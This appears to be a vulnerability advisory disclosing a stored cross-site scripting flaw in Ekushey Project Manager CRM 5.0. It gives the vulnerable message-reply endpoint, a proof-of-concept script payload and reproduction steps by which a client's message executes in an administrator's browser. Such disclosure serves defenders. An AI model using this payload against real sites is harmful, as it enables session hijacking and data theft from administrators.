Ekushey Project Manager CRM 5.0 Cross Site Scripting

2023.07.13

Credit: CraCkEr

Risk: Low

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-79

# Exploit Title: Ekushey Project Manager CRM 5.0 - Stored XSS
# Exploit Author: CraCkEr
# Vendor: Creativeitem
# Vendor Homepage: https://creativeitem.com/
# Software Link: https://demo.creativeitem.com/ekushey/
# Tested on: Windows 10 Pro
# Impact: Manipulate the content of the site
## Description
Allow Attacker to inject malicious code into website, give ability to steal sensitive
information, manipulate data, and launch additional attacks.
Path: /ekushey/index.php/client/message/message_read/xxxxxxxx[random-msg-hash]
POST parameter 'message' is vulnerable to XSS
-----------------------------------------------
POST /ekushey/index.php/client/message/send_reply/8c8936d3 HTTP/2
-----------------------------------------------
Content-Disposition: form-data; name="message"
<script>alert(1)</script>
-----------------------------------------------
## Steps to Reproduce:
1. Login as (Client)
2. Go to [Message] on this Path: https://website/ekushey/index.php/client/message
3. Select any Person to MSG (Clients or ADMINS]
4. Inject your XSS Payload in [Replay Message]
5. Send
6. XSS Fired on Local Browser
7. When ADMIN visit [Dashboard] or any section in Administration Panel on this Path : https://website/ekushey/index.php/admin/dashboard
8. XSS Will Fire and Executed on his Browser
[-] Done

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Ekushey Project Manager CRM 5.0 Cross Site Scripting

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.